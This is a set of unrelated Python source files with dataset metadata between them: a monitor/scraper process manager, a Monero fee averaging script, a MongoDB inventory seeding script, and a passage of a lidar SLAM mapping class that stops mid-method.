    valid, missing = cmd.has_valid_args(self.add_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"Missing arguments: {missing}"
        return response
    payload = cast(Dict[str, Any], cmd.payload)
    db_scraper = self.register_db["scrapers"].find_one(
        {"name": payload["name"]}
    )
    if not db_scraper:
        response = badResponse()
        response.error = ERRORS.SCRAPER_NOT_REGISTERED
        response.info = f"Tried to add scraper {payload['name']} but it was not found in the db. Did you start it at least once manually?"
        return response
    started, reason = await self.add_scraper(db_scraper["path"], payload)
    if started:
        return okResponse()
    response = badResponse()
    response.error = ERRORS.MM_COULDNT_ADD_SCRAPER
    response.info = reason
    return response
async def on_add_monitor_scraper(self, cmd: Cmd) -> Response:
    """Add a monitor and its matching scraper concurrently."""
    monitor_cmd = cmd
    scraper_cmd = copy.copy(cmd)
    # Deep-copy the payload so the two handlers cannot mutate shared state.
    scraper_cmd.payload = copy.deepcopy(monitor_cmd.payload)
    monitor_resp, scraper_resp = await asyncio.gather(
        self.on_add_monitor(monitor_cmd), self.on_add_scraper(scraper_cmd)
    )
    combined = Response()
    if monitor_resp.error.value or scraper_resp.error.value:
        combined.error = ERRORS.MM_COULDNT_ADD_MONITOR_SCRAPER
    else:
        combined.error = ERRORS.OK
    combined.info = f"Monitor: {monitor_resp.error.name}, Scraper: {scraper_resp.error.name}"
    if combined.error.value and combined.error:
        self.general_logger.warning(f"Couldn't add monitor and scraper")
        kekmonitors.utils.tools.dump_error(self.general_logger, combined)
    return combined
async def on_stop_monitor(self, cmd: Cmd) -> Response:
    """Forward a STOP command to the named monitor's socket."""
    valid, missing = cmd.has_valid_args(self.stop_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"Missing arguments: {missing}"
        return response
    payload = cast(Dict[str, Any], cmd.payload)
    socket = f"{self.config['GlobalConfig']['socket_path']}/Monitor.{payload['name']}"
    stop_cmd = Cmd()
    stop_cmd.cmd = COMMANDS.STOP
    self.general_logger.debug(f"Sending STOP to {socket}...")
    response = await self.make_request(socket, stop_cmd)
    self.general_logger.debug(f"Sent STOP to {socket}")
    return response
async def on_stop_scraper(self, cmd: Cmd) -> Response:
    """Forward a STOP command to the named scraper's socket."""
    valid, missing = cmd.has_valid_args(self.stop_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"Missing arguments: {missing}"
        return response
    payload = cast(Dict[str, Any], cmd.payload)
    socket = f"{self.config['GlobalConfig']['socket_path']}/Scraper.{payload['name']}"
    stop_cmd = Cmd()
    stop_cmd.cmd = COMMANDS.STOP
    self.general_logger.debug(f"Sending STOP to {socket}...")
    response = await self.make_request(socket, stop_cmd)
    self.general_logger.debug(f"Sent STOP to {socket}")
    return response
async def on_stop_monitor_scraper(self, cmd: Cmd) -> Response:
    """Stop a monitor and its matching scraper concurrently."""
    valid, missing = cmd.has_valid_args(self.stop_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"Missing arguments: {missing}"
        return response
    response = badResponse()
    monitor_resp, scraper_resp = await asyncio.gather(
        self.on_stop_monitor(cmd), self.on_stop_scraper(cmd)
    )
    if monitor_resp.error.value or scraper_resp.error.value:
        response.error = ERRORS.MM_COULDNT_STOP_MONITOR_SCRAPER
    else:
        response.error = ERRORS.OK
    response.info = f"Monitor: {monitor_resp.error.name}, Scraper: {scraper_resp.error.name}"
    if response.error.value and response.error:
        self.general_logger.warning(f"Couldn't stop monitor and scraper")
        kekmonitors.utils.tools.dump_error(self.general_logger, response)
    return response
async def on_get_monitor_status(self, cmd: Cmd) -> Response:
    """Report the tracked monitor processes and available monitor sockets.

    Returns an ok Response whose payload maps each monitored class name
    to its start time and PID, plus the class-name -> socket-path map.
    """
    process_status = {}
    for class_name in self.monitor_processes:
        start = self.monitor_processes[class_name]["start"].strftime(
            "%m/%d/%Y, %H:%M:%S"
        )
        process_status[class_name] = {
            "Started at": start,
            "PID": self.monitor_processes[class_name]["process"].pid,
        }
    response = okResponse()
    response.payload = {
        "monitored_processes": process_status,
        # The socket registry already maps class name -> socket path;
        # (removed a dead `sockets_status = {}` that was overwritten).
        "available_sockets": self.monitor_sockets,
    }
    return response
async def on_get_scraper_status(self, cmd: Cmd) -> Response:
    """Report the tracked scraper processes and available scraper sockets.

    Returns an ok Response whose payload maps each monitored class name
    to its start time and PID, plus the class-name -> socket-path map.
    """
    process_status = {}
    for class_name in self.scraper_processes:
        start = self.scraper_processes[class_name]["start"].strftime(
            "%m/%d/%Y, %H:%M:%S"
        )
        process_status[class_name] = {
            "Started at": start,
            "PID": self.scraper_processes[class_name]["process"].pid,
        }
    response = okResponse()
    response.payload = {
        "monitored_processes": process_status,
        # The socket registry already maps class name -> socket path;
        # (removed a dead `sockets_status = {}` that was overwritten).
        "available_sockets": self.scraper_sockets,
    }
    return response
async def on_get_status(self, cmd: Cmd) -> Response:
    """Aggregate the monitor and scraper status reports into one payload."""
    monitor_status = await self.on_get_monitor_status(cmd)
    scraper_status = await self.on_get_scraper_status(cmd)
    monitor_payload = cast(Dict[str, Any], monitor_status.payload)  # type: Dict[str, Any]
    scraper_payload = cast(Dict[str, Any], scraper_status.payload)  # type: Dict[str, Any]
    response = okResponse()
    response.payload = {"monitors": monitor_payload, "scrapers": scraper_payload}
    return response
async def add_monitor(self, filename: str, kwargs: Dict[str, str]):
    """Spawn a monitor process from the script at *filename*.

    Every remaining entry in *kwargs* (after popping "name") is forwarded
    as a `--key value` CLI option. Returns (success, message); message is
    empty on success.

    Bug fix: *filename* was previously unused and the spawned command
    contained a literal placeholder instead of the script path.
    """
    class_name = kwargs.pop("name")
    if class_name in self.monitor_processes:
        self.general_logger.debug(
            f"Tried to add an already existing monitor ({class_name} ({filename}))"
        )
        return False, "Monitor already started."
    first_part_cmd = (
        f"nohup {sys.executable} {filename} --no-output --no-config-watcher"
    )
    # Forward every remaining kwarg as a CLI option.
    args = [f"--{key} {kwargs[key]}" for key in kwargs]
    cmd = " ".join((first_part_cmd, *args))
    self.general_logger.debug(f"Starting {class_name} ({filename})...")
    monitor = subprocess.Popen(
        shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )
    await asyncio.sleep(2)  # wait to check if process is still alive
    if monitor.poll() is not None:
        success = False
        msg = f"Failed to start monitor {class_name} ({filename})"
        self.general_logger.warning(
            f"Tried to start {class_name} ({filename}) but failed"
        )
    else:
        self.general_logger.info(
            f"Added monitor {class_name} with pid {monitor.pid}"
        )
        self.monitor_processes[class_name] = {
            "process": monitor,
            "start": datetime.now(),
        }
        success = True
        msg = ""
    return success, msg
async def add_scraper(self, filename: str, kwargs: Dict[str, str]):
    """Spawn a scraper process from the script at *filename*.

    Every remaining entry in *kwargs* (after popping "name") is forwarded
    as a `--key value` CLI option. Returns (success, message); message is
    empty on success.

    Bug fixes: *filename* was previously unused (the command contained a
    literal placeholder), and the argument join is now consistent with
    add_monitor (no trailing space when there are no extra args).
    """
    class_name = kwargs.pop("name")
    if class_name in self.scraper_processes:
        self.general_logger.debug(
            f"Tried to add an already existing scraper ({class_name} ({filename}))"
        )
        return False, "Scraper already started."
    first_part_cmd = (
        f"nohup {sys.executable} {filename} --no-output --no-config-watcher"
    )
    # Forward every remaining kwarg as a CLI option.
    args = [f"--{key} {kwargs[key]}" for key in kwargs]
    cmd = " ".join((first_part_cmd, *args))
    self.general_logger.debug(f"Starting {class_name} ({filename})...")
    scraper = subprocess.Popen(
        shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )
    await asyncio.sleep(2)  # wait to check if process is still alive
    if scraper.poll() is not None:
        success = False
        msg = f"Failed to start scraper {class_name} ({filename})"
        self.general_logger.warning(
            f"Tried to start {class_name} ({filename}) but failed"
        )
    else:
        self.general_logger.info(
            f"Added scraper {class_name} with pid {scraper.pid}"
        )
        self.scraper_processes[class_name] = {
            "process": scraper,
            "start": datetime.now(),
        }
        success = True
        msg = ""
    return success, msg
# ---------------------------------------------------------------------
# Thin command handlers: each forwards to the generic specific/common
# config getter/setter with the right target file or command, and a
# boolean selecting monitors (True) vs scrapers (False).
# ---------------------------------------------------------------------
async def on_get_monitor_config(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_CONFIG, True)

async def on_set_monitor_config(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "configs.json", True)

async def on_get_monitor_whitelist(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_WHITELIST, True)

async def on_set_monitor_whitelist(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "whitelists.json", True)

async def on_get_monitor_blacklist(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_BLACKLIST, True)

async def on_set_monitor_blacklist(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "blacklists.json", True)

async def on_get_monitor_webhooks(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_WEBHOOKS, True)

async def on_set_monitor_webhooks(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "webhooks.json", True)

async def on_get_scraper_config(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_CONFIG, False)

async def on_set_scraper_config(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "configs.json", False)

async def on_get_scraper_whitelist(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_WHITELIST, False)

async def on_set_scraper_whitelist(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "whitelists.json", False)

async def on_get_scraper_blacklist(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_BLACKLIST, False)

async def on_set_scraper_blacklist(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "blacklists.json", False)

async def on_get_scraper_webhooks(self, cmd: Cmd) -> Response:
    return await self.specific_config_getter(cmd, COMMANDS.GET_WEBHOOKS, False)

async def on_set_scraper_webhooks(self, cmd: Cmd) -> Response:
    return await self.specific_config_setter(cmd, "webhooks.json", False)

# Handlers below update the *common* config files shared by both families.
async def on_set_monitor_scraper_blacklist(self, cmd: Cmd) -> Response:
    return await self.common_config_setter(cmd, "blacklists.json")

async def on_set_monitor_scraper_whitelist(self, cmd: Cmd) -> Response:
    return await self.common_config_setter(cmd, "whitelists.json")

async def on_set_monitor_scraper_webhooks(self, cmd: Cmd) -> Response:
    return await self.common_config_setter(cmd, "webhooks.json")

async def on_set_monitor_scraper_configs(self, cmd: Cmd) -> Response:
    return await self.common_config_setter(cmd, "configs.json")
async def specific_config_getter(
    self, cmd: Cmd, command: COMMANDS, is_monitor: bool
):
    """Forward a GET_* *command* to the named monitor/scraper socket."""
    valid, missing = cmd.has_valid_args(self.getter_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"{missing}"
        return response
    payload = cast(Dict[str, Any], cmd.payload)
    request = Cmd()
    request.cmd = command
    prefix = 'Monitor' if is_monitor else 'Scraper'
    socket = f"{self.config['GlobalConfig']['socket_path']}/{prefix}.{payload['name']}"
    return await self.make_request(socket, request)
async def specific_config_setter(self, cmd: Cmd, filename: str, is_monitor: bool):
    """Merge the command payload into a monitor/scraper-specific config file.

    Writes payload["payload"] under the key payload["name"] in *filename*
    (inside the "monitors" or "scrapers" config folder) and returns a
    Response. Bug fix: the success path previously fell through and
    returned None, although callers are typed `-> Response`.
    """
    success, missing = cmd.has_valid_args(self.setter_args)
    if success:
        payload = cast(Dict[str, Any], cmd.payload)
        cp = os.path.sep.join(
            (
                self.config["GlobalConfig"]["config_path"],
                "monitors" if is_monitor else "scrapers",
                filename,
            )
        )
        with open(cp, "r") as rf:
            f = json.load(rf)
        f[payload["name"]] = payload["payload"]
        with open(cp, "w") as wf:
            json.dump(f, wf)
        # Report success to the caller instead of returning None.
        return okResponse()
    else:
        r = badResponse()
        r.error = ERRORS.MISSING_PAYLOAD_ARGS
        r.info = f"{missing}"
        return r
async def common_config_setter(self, cmd: Cmd, filename: str):
    """Merge the command payload into a common config file.

    Writes payload["payload"] under the key payload["name"] in *filename*
    (inside the "common" config folder) and returns a Response. Bug fix:
    the success path previously fell through and returned None, although
    callers are typed `-> Response`.
    """
    success, missing = cmd.has_valid_args(self.setter_args)
    if success:
        payload = cast(Dict[str, Any], cmd.payload)
        cp = os.path.sep.join(
            (self.config["GlobalConfig"]["config_path"], "common", filename)
        )
        with open(cp, "r") as rf:
            f = json.load(rf)
        f[payload["name"]] = payload["payload"]
        with open(cp, "w") as wf:
            json.dump(f, wf)
        # Report success to the caller instead of returning None.
        return okResponse()
    else:
        r = badResponse()
        r.error = ERRORS.MISSING_PAYLOAD_ARGS
        r.info = f"{missing}"
        return r
async def on_get_scraper_shoes(self, cmd: Cmd) -> Response:
    """Request the shoes via GET_SHOES for the named instance.

    NOTE(review): this sends the request to the *Monitor* socket even
    though the handler name says scraper — confirm this is intentional.
    """
    valid, missing = cmd.has_valid_args(self.getter_args)
    if not valid:
        response = badResponse()
        response.error = ERRORS.MISSING_PAYLOAD_ARGS
        response.info = f"{missing}"
        return response
    payload = cast(Dict[str, Any], cmd.payload)
    request = Cmd()
    request.cmd = COMMANDS.GET_SHOES
    socket = f"{self.config['GlobalConfig']['socket_path']}/Monitor.{payload['name']}"
    return await self.make_request(socket, request)
async def on_get_monitor_shoes(self, cmd: Cmd) -> Response:
    """Ask the named monitor for its shoes.

    Bug fix: this getter previously sent COMMANDS.SET_SHOES; the parallel
    scraper handler sends GET_SHOES, which matches a getter's purpose.
    """
    success, missing = cmd.has_valid_args(self.getter_args)
    if success:
        payload = cast(Dict[str, Any], cmd.payload)
        c = Cmd()
        c.cmd = COMMANDS.GET_SHOES
        r = await self.make_request(
            f"{self.config['GlobalConfig']['socket_path']}/Monitor.{payload['name']}",
            c,
        )
        return r
    else:
        r = badResponse()
        r.error = ERRORS.MISSING_PAYLOAD_ARGS
        r.info = f"{missing}"
        return r
# Script entry point: construct the manager and run its event loop.
if __name__ == "__main__":
    MonitorManager().start()
| berton7/kek-monitors | kekmonitors/monitor_manager.py | monitor_manager.py | py | 41,901 | python | en | code | 8 | github-code | 1 | [
{
"api_name": "sys.version_info",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "kekmonitors.comms.server.Server",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "wa... |
42604295575 | from app import db
from app.models import \
MoneroTransactions, MoneroWalletFee
from app.generalfunctions import floating_decimals
from sqlalchemy import func
def getlastestfee():
    """
    Average the fee of the last 10 withdrawal transactions and store it
    as the current Monero wallet fee estimate (MoneroWalletFee id=1).
    """
    # Bug fix: the previous query applied order_by/limit to an AVG()
    # aggregate, which is a no-op (the aggregate collapses to one row).
    # Average over a subquery restricted to the 10 most recent
    # withdrawals (category == 2) instead.
    last_withdrawals = (
        db.session.query(MoneroTransactions.fee)
        .filter(MoneroTransactions.category == 2)
        .order_by(MoneroTransactions.created.desc())
        .limit(10)
        .subquery()
    )
    avg_fee = db.session.query(func.avg(last_withdrawals.c.fee)).scalar()
    rounded_fee = floating_decimals(avg_fee, 8)
    thefee = db.session.query(MoneroWalletFee).filter_by(id=1).first()
    thefee.amount = rounded_fee
    db.session.add(thefee)
    db.session.commit()
# Recompute the stored withdrawal-fee estimate when the script runs.
getlastestfee()
{
"api_name": "app.db.session.query",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "app.db.session",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "app.db",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.avg",... |
15933889767 | import pymongo
from pymongo import MongoClient
# Connect to the local MongoDB instance and rebuild the sample Inventory
# collection, stored sorted by product name.
cluster = MongoClient("mongodb://localhost:27017")
database = cluster["Storage"]
collection = database["Inventory"]

# Start from an empty collection.
collection.delete_many({})

post = {"_id": 0,
        "quantity": 400,
        "productId": 0,
        "productName": "Soap",
        "price": 200,
        "category": "Personal Protective Equipment (PPE)",
        "vendor": "Vendor1",
        "added_count": 20}
post1 = {"_id": 1,
         "quantity": 400,
         "productId": 1,
         "productName": "Brush",
         "price": 400,
         "category": "Surgical Supplies",
         "vendor": "Vendor2",
         "added_count": 10}
post2 = {"_id": 2,
         "quantity": 800,
         "productId": 2,
         "productName": "Mask",
         "price": 10,
         "category": "Laboratory Supplies",
         "vendor": "Vendor1",
         "added_count": 15}
post3 = {"_id": 3,
         "quantity": 100,
         "productId": 3,
         "productName": "Sanitizers",
         "price": 300,
         "category": "Sterile instruments",
         "vendor": "Vendor2",
         "added_count": 2}
post4 = {"_id": 4,
         "quantity": 100,
         "productId": 4,
         "productName": "Sanitizers",
         "price": 300,
         "category": "Pharmaceuticals",
         "vendor": "Vendor1",
         "added_count": 1}
post5 = {"_id": 5,
         "quantity": 50,
         "productId": 5,
         "productName": "Condoms",
         "price": 2.99,
         "category": "Diagnostic Equipment",
         "vendor": "Vendor2",
         "added_count": 6}
post6 = {"_id": 6,
         "quantity": 20,
         "productId": 6,
         "productName": "Medicines",
         "price": 10,
         "category": "Wound Care Supplies",
         "vendor": "Vendor1",
         "added_count": 7}
post7 = {"_id": 7,
         "quantity": 20,
         "productId": 7,
         "productName": "Mac",
         "price": 20,
         "category": "Laboratory Supplies",
         "vendor": "Vendor1",
         "added_count": 8}

# Bug fix: `post` (_id 0) was defined but never inserted; include it.
collection.insert_many([post, post1, post2, post3, post4, post5, post6, post7])

# Rewrite the collection in productName order so plain reads come back sorted.
sorted_docs = list(collection.find().sort('productName', 1))
collection.delete_many({})
collection.insert_many(sorted_docs)
| Nirusan03/FYP_Abi | mongodb.py | mongodb.py | py | 2,346 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 4,
"usage_type": "call"
}
] |
35718269403 | # -*- coding: utf-8 -*-
"""
Course: CS 4365/5354 [Computer Vision]
Author: Jose Perez [ID: 80473954]
Assignment: Lab 2
Instructor: Olac Fuentes
"""
from timeit import default_timer as timer
import numpy as np
from scipy import signal
# ========================= Constants =========================
# Matrix used for convolution of the HOGs
convolution_matrix = np.array([[-1, 0, 1]])
def integral_sums_image(im, region, number_of_bars=12):
# Initialize using the first color channel
imx = np.zeros(im[:,:,0].shape)
imx = signal.convolve(im[:,:,0], convolution_matrix, mode='same')
imy = np.zeros(im[:,:,0].shape)
imy = signal.convolve(im[:,:,0], np.transpose(convolution_matrix), mode='same')
magnitude = np.sqrt(imx**2+imy**2)
direction = (np.arctan2(imy, imx) * 180 / np.pi) + 180 # From 0 to 360
# Go through the other color channels
# Get the maximum magnitude for each
for i in range(1, 3):
imx = np.zeros(im[:,:,i].shape)
imx = signal.convolve(im[:,:,i], convolution_matrix, mode='same')
imy = np.zeros(im[:,:,i].shape)
imy = signal.convolve(im[:,:,i], np.transpose(convolution_matrix), mode='same')
curr_magnitude = np.sqrt(imx**2+imy**2)
curr_direction = (np.arctan2(imy, imx) * 180 / np.pi) + 180 # From 0 to 360
magnitude = np.maximum(magnitude, curr_magnitude)
direction = np.maximum(direction, curr_direction)
#print "[Integral HOG] Finished getting magnitude and direction"
start_time = timer()
angle_step = 360 / number_of_bars
angle_range = xrange(0, 360, angle_step)
(w, h) = region.shape[:2]
(row, column) = im.shape[:2]
row += 1
column += 1
integral_sums = np.zeros((12, row-h, column-w ), dtype=np.float64)
i = 0
#print "[Integral HOG] Starting calculation of sums"
for angle in angle_range:
integral = magnitude.copy().astype(np.float64)
# Set the magnitude for all other angles to 0
integral[np.logical_or(direction<angle, direction>=angle+30)] = 0
integral = integral.cumsum(1).cumsum(0)
integral = np.pad(integral, (1, 0), 'constant', constant_values=(0))
A = integral[0:row-h, 0:column-w]
B = integral[0:row-h, w:column]
C = integral[h:row, 0:column-w]
D = integral[h:, w:]
#pdb.set_trace()
integral_sums[i] = A + D - B - C
i = i + 1
end_time = timer()
print('[Integral HOG] Duration: ' + str(end_time - start_time))
return integral_sums | DeveloperJose/Python-CS4363-Computer-Vision | Lab2_Detection/Zip/integral_sums_image.py | integral_sums_image.py | py | 2,635 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "scipy.signal.convolve",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "scipy.signal",
"lin... |
21946634176 | #*
# SLAM.py: the implementation of SLAM
# created and maintained by Ty Nguyen
# tynguyen@seas.upenn.edu
# Feb 2020
#*
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
from MapUtils.bresenham2D import *
from probs_utils import *
import numpy as np
import matplotlib.pyplot as plt
import load_data as ld
import os, sys, time
import p3_util as ut
from read_data import LIDAR, JOINTS
import probs_utils as prob
import math
import cv2
import transformations as tf
from copy import deepcopy
from mpl_toolkits.mplot3d import Axes3D
import logging
if (sys.version_info > (3, 0)):
import pickle
else:
import cPickle as pickle
logger = logging.getLogger()
logger.setLevel(os.environ.get("LOGLEVEL", "INFO"))
class SLAM(object):
def __init__(self):
    # Populate the fixed sensor characteristics (lidar height, hit/miss
    # odds, occupancy threshold) at construction time; data, particles
    # and the map are initialized later via the _read_data/_init_* calls.
    self._characterize_sensor_specs()
def _read_data(self, src_dir, dataset=0, split_name='train'):
    """Load the lidar and joints (IMU) recordings for one dataset split.

    Populates self.lidar_, self.joints_, the per-beam lidar angles and
    self.num_data_ (number of lidar samples).
    """
    self.dataset_ = str(dataset)
    # Append the split folder (e.g. ".../train") if not already in the path.
    if split_name.lower() not in src_dir:
        src_dir = src_dir + '/' + split_name
    print('\n------Reading Lidar and Joints (IMU)------')
    self.lidar_ = LIDAR(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_lidar' + self.dataset_)
    print ('\n------Reading Joints Data------')
    self.joints_ = JOINTS(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_joint' + self.dataset_)
    # Beam angles: lidar sweeps from -135 to +135 degrees at resolution `res`.
    res = self.lidar_.data_[0]['res'][0][0]
    self.lidar_angles = np.arange(-135 * np.pi / 180, 135.003 * np.pi / 180, res).reshape(1, -1)
    self.num_data_ = len(self.lidar_.data_)
    # Position of odometry
    self.odo_indices_ = np.empty((2, self.num_data_), dtype=np.int64)
    # Cursor used by getJointTime to resume the joints-timestamp search.
    self.temp = 0
def _characterize_sensor_specs(self, p_thresh=None):
    """Set fixed sensor constants: lidar mounting height, hit/miss
    likelihood ratios, and the occupancy probability/log-odds thresholds.

    :param p_thresh: probability above which a cell counts as occupied
        (defaults to 0.6).
    """
    # High of the lidar from the ground (meters)
    self.h_lidar_ = 0.93 + 0.33 + 0.15
    # Accuracy of the lidar: odds multipliers applied for a hit vs a miss
    self.p_true_ = 9
    self.p_false_ = 1.0 / 9
    # TODO: set a threshold value of probability to consider a map's cell occupied
    self.p_thresh_ = 0.6 if p_thresh is None else p_thresh  # > p_thresh => occupied and vice versa
    # Compute the corresponding threshold value of logodd
    self.logodd_thresh_ = prob.log_thresh_from_pdf_thresh(self.p_thresh_)
def getJointTime(self, time):
    """Return the index of the last joints (IMU) sample recorded no later
    than lidar sample *time*; timestamps are compared as offsets from
    each stream's first sample.

    NOTE(review): relies on self.temp to resume the linear scan, so this
    assumes calls come with non-decreasing *time* — confirm callers do so.
    """
    t = self.temp
    # Advance while the joints timestamp still lags the lidar timestamp.
    while ((self.lidar_.data_[time]['t'][0] - self.lidar_.data_[0]['t'][0] > (self.joints_.data_['ts'][0][t] - self.joints_.data_['ts'][0][0])) and (t + 1 < len(self.joints_.data_['ts'][0]))):
        t = t + 1
    self.temp = t
    # Step back one sample: t is the first index that overshoots.
    return t - 1
def _init_particles(self, num_p=0, mov_cov=None, particles=None, weights=None, percent_eff_p_thresh=None):
    """Allocate the particle set, weights, best-particle history and the
    movement-model covariance used by the particle filter.

    NOTE(review): with the default num_p=0 and weights=None, the uniform
    weight computation divides by zero — callers apparently always pass
    num_p > 0; confirm.
    """
    # Particles representation: one (x, y, theta) column per particle
    self.num_p_ = num_p
    # self.percent_eff_p_thresh_ = percent_eff_p_thresh
    self.particles_ = np.zeros((3, self.num_p_), dtype=np.float64) if particles is None else particles
    # Weights for particles (uniform by default)
    self.weights_ = 1.0 / self.num_p_ * np.ones(self.num_p_) if weights is None else weights
    # Position of the best particle after update on the map
    self.best_p_indices_ = np.empty((2, self.num_data_), dtype=np.int64)
    # Best particles
    self.best_p_ = np.empty((3, self.num_data_))
    # Corresponding time stamps of best particles
    self.time_ = np.empty(self.num_data_)
    # Covariance matrix of the movement model (near-zero default noise)
    tiny_mov_cov = np.array([[1e-8, 0, 0], [0, 1e-8, 0], [0, 0, 1e-8]])
    self.mov_cov_ = mov_cov if mov_cov is not None else tiny_mov_cov
    # To generate random noise: x, y, z = np.random.multivariate_normal(np.zeros(3), mov_cov, 1).T
    # this return [x], [y], [z]
    # Threshold (fraction of effective particles) for resampling the particles
    self.percent_eff_p_thresh_ = percent_eff_p_thresh
def _init_map(self, map_resolution=0.05):
'''*Input: resolution of the map - distance between two grid cells (meters)'''
# Map representation
MAP= {}
MAP['res'] = map_resolution #meters
MAP['xmin'] = -20 #meters
MAP['ymin'] = -20
MAP['xmax'] = 20
MAP['ymax'] = 20
MAP['sizex'] = int(np.ceil((MAP['xmax'] - MAP['xmin']) / MAP['res'] + 1)) #cells
MAP['sizey'] = int(np.ceil((MAP['ymax'] - MAP['ymin']) / MAP['res'] + 1))
MAP['map'] = np.zeros((MAP['sizex'],MAP['sizey']),dtype=np.int8) #DATA TYPE: char or int8
self.MAP_ = MAP
self.bresenDict = {}
self.log_odds_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)
self.occu_ = np.ones((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)
# Number of measurements for each cell
self.num_m_per_cell_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.uint64)
# def getCorrMap(self,map,occX,occY):
# r = np.zeros(map.shape)
# r[occX,occY] = 1
# return np.sum(np.logical_and(r,map))
def getMapCoord(self,x,y):
x_map = np.uint16((x-self.MAP_['xmin'])/self.MAP_['res'])
y_map = np.uint16((y-self.MAP_['ymin'])/self.MAP_['res'])
return x_map,y_map
def buildMAP(self, t, x, y, theta):
    """Ray-trace the lidar scan at time index t from pose (x, y, theta)
    into the occupancy grid, updating log-odds and the binary map.

    t: lidar time index; x, y: world position (meters); theta: heading.
    Side effects: mutates self.log_odds_, self.MAP_['map'], the Bresenham
    cache self.bresenDict and its bookkeeping (self.psx/psy/dict_use_count).
    """
    tj0 = self.getJointTime(t)
    scan = self.lidar_.data_[t]['scan'][0]
    neck_angle, head_angle = self.joints_.data_['head_angles'][:, tj0][0], self.joints_.data_['head_angles'][:, tj0][1]
    # Lidar frame -> body frame (neck yaw, then head pitch), then body -> ground.
    body_2_lidar_rot = tf.homo_transform(np.dot(tf.rot_z_axis(neck_angle), tf.rot_y_axis(head_angle)), [0, 0, 0])
    ground_2_body = tf.homo_transform(tf.rot_z_axis(theta), [x, y, self.h_lidar_])
    # Homogeneous lidar endpoints in the sensor frame.
    # FIX: np.float was removed in NumPy 1.24 — use an explicit float64 dtype.
    homoscan = np.empty((4, (self.lidar_angles).shape[1]), dtype=np.float64)
    homoscan[0, :] = np.cos(self.lidar_angles) * scan
    homoscan[1, :] = np.sin(self.lidar_angles) * scan
    homoscan[2, :] = np.zeros((1, self.lidar_angles.shape[1]))
    homoscan[3, :] = np.ones(self.lidar_angles.shape[1])
    ground_2_lidar = np.dot(ground_2_body, body_2_lidar_rot)
    trans_scan = (np.dot(ground_2_lidar, homoscan)).astype(np.float16)
    # Returns whose z is below 0.1 m are treated as ground hits, not obstacles.
    ground_zz = trans_scan[2] < 0.1
    x_new = ((trans_scan[0] - self.MAP_['xmin']) // self.MAP_['res']).astype(np.uint16)
    y_new = ((trans_scan[1] - self.MAP_['ymin']) // self.MAP_['res']).astype(np.uint16)
    x_start = ((x - self.MAP_['xmin']) // self.MAP_['res']).astype(np.uint16)
    # BUG FIX: the y offset must use 'ymin' (the original used 'xmin'; the two
    # happen to coincide for this square map, so results were unaffected here,
    # but the formula was wrong for any non-square extent).
    y_start = ((y - self.MAP_['ymin']) // self.MAP_['res']).astype(np.uint16)
    # The Bresenham cache is only valid while the ray start cell is unchanged.
    if not (self.psx == x_start and self.psy == y_start):
        self.bresenDict = {}
        self.psx = x_start
        self.psy = y_start
    for x_n, y_n, ground in zip(x_new, y_new, ground_zz):
        if abs(x_n) < self.MAP_['sizex'] and abs(y_n) < self.MAP_['sizey']:
            if self.bresenDict.get((x_n, y_n)) is None:
                ray_cells = bresenham2D(x_start, y_start, x_n, y_n)
                self.bresenDict[(x_n, y_n)] = ray_cells
            else:
                ray_cells = self.bresenDict[(x_n, y_n)]
                self.dict_use_count = self.dict_use_count + 1
            # Renamed from x/y so the pose arguments are not shadowed.
            rx = np.asarray(ray_cells[0], dtype=int)
            ry = np.asarray(ray_cells[1], dtype=int)
            x_end = rx[-1]
            y_end = ry[-1]
            rx = rx[:-1]
            ry = ry[:-1]
            # Cells the beam passed through become more likely free...
            self.log_odds_[rx, ry] = self.log_odds_[rx, ry] + np.log(self.p_false_)
            self.MAP_['map'][rx, ry] = self.log_odds_[rx, ry] > np.log(1.5)
